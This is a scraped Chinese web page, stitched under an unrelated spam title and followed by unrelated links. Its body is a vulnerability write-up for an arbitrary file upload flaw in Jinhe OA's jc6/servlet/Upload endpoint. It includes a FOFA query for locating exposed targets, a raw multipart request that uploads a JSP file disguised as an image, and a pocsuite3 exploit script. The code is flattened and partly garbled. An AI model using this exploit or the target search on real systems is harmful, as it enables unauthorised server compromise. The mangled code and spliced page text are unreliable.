当前位置: 首页 > news >正文

网站建设客户问题公司网站做的很烂

网站建设客户问题,公司网站做的很烂,二维码活码生成器在线制作,沈阳网站建设索王道下拉免责声明 文章中涉及的漏洞均已修复#xff0c;敏感信息均已做打码处理#xff0c;文章仅做经验分享用途#xff0c;切勿当真#xff0c;未授权的攻击属于非法行为#xff01;文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的…免责声明 文章中涉及的漏洞均已修复敏感信息均已做打码处理文章仅做经验分享用途切勿当真未授权的攻击属于非法行为文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责作者不为此承担任何责任一旦造成后果请自行负责 漏洞描述 金和OA jc6/servlet/Upload接口存在任意文件上传漏洞。 fofa语句 app金和网络-金和OA||body/jc6/platform/sys/login poc加检测 POST /jc6/servlet/Upload?officeSaveFlag0dbimgfalsepathsetpath/upload/ HTTP/1.1 Host: Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Content-Type: multipart/form-data; boundaryee055230808ca4602e92d0b7c4ecc63d--ee055230808ca4602e92d0b7c4ecc63d Content-Disposition: form-data; nameimg; filename1.jsp Content-Type: image/jpeg% out.println(tteesstt1); % --ee055230808ca4602e92d0b7c4ecc63d-- 上传成功后拼接返回的路径url/jc6/路径 poc脚本 脚本使用pocsuite框架 # _*_ coding:utf-8 _*_ # Time : 2024/1/16 # Author: 炼金术师诸葛亮 import re from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD, random_strclass jinhe_jc6_upload(POCBase):pocDesc 金和OA jc6/servlet/Upload接口任意文件上传漏洞author 炼金术师诸葛亮createDate 2024-1-16name 金和OA jc6/servlet/Upload接口任意文件上传漏洞def _verify(self):result {}url self.url /jc6/servlet/Upload?officeSaveFlag0dbimgfalsepathsetpath/upload/check_path self.url /test.aspxheaders {User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1),Accept: */*,Accept-Encoding: gzip, deflate,Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2,Connection: close,Content-Type: multipart/form-data; boundaryee055230808ca4602e92d0b7c4ecc63d}try:data --ee055230808ca4602e92d0b7c4ecc63d\r\nContent-Disposition: form-data; nameimg; filename1.jsp\r\nContent-Type: image/jpeg\r\n\r\n% out.println(tteesstt1); %\r\n--ee055230808ca4602e92d0b7c4ecc63d--response requests.post(url, headersheaders, datadata)if response.status_code 200 and upload in response.text:rtextresponse.textpath re.search(rarr\[2](.*?), rtext)if path:check_path self.url /jc6/ path.group(1)check_response requests.get(check_path)if check_response.status_code 200 and tteesstt1 in check_response.text:result[VerifyInfo] {}return self.parse_output(result)except Exception as e:passregister_poc(jinhe_jc6_upload) 脚本利用
http://www.pierceye.com/news/686193/

相关文章:

  • 社交网站开发语言河北建设工程信息网首页
  • 上海营销型网站建设公司wordpress 自己做页面
  • 网站布局选择临淄信息网手机版
  • 怎样申请网站呢注册商标怎么注册商标
  • 网站地址英文不相关的网站做单项链接可以吗
  • 怎么做网站超链接wordpress 主题 设置
  • 手机电影网站建设如何做网站域名备案
  • 重庆手机网站推广价格网络营销论文参考文献
  • 如何给网站添加搜索关键字做流量网站有收入吗
  • 购物网站的英文如何不让百度收录网站
  • 上海定制网站建设公司哪家好建立公司官网
  • jsp电影网站开发教程滁州网站建设梦天堂
  • 网站建设哪个好一些网站服务器证书有问题
  • 广东省广州市白云区钟落潭镇优化什么建立生育支持政策体系
  • wordpress+代码质量哈尔滨百度seo代理
  • 北京模板网站建设全包中国招标与采购网官网
  • 戴尔公司网站建设成功的关键是什么永久网站
  • 上海青浦做网站做分销网站系统
  • 互联网公司网站建设的目的王烨演员
  • 网站开发图片加载慢如皋建设网站
  • 国家示范校建设成果网站wordpress文章图片alt
  • asp.net网站开发技术物流专线网站建设
  • 免费网站流量统计工具线下推广方法及策略
  • 西安市社交网站制作公司网站建设的参考文献
  • 企业网站内容建设网站开发小程序开发
  • 个人个案网站 类型wordpress群组
  • 微网站建设深圳英文站seo
  • 做网站要钱么网站建设备案多长时间
  • wordpress建站图片效果网站备案前置审批 成都
  • 哈尔滨网站关键词优化手机网站视频播放模板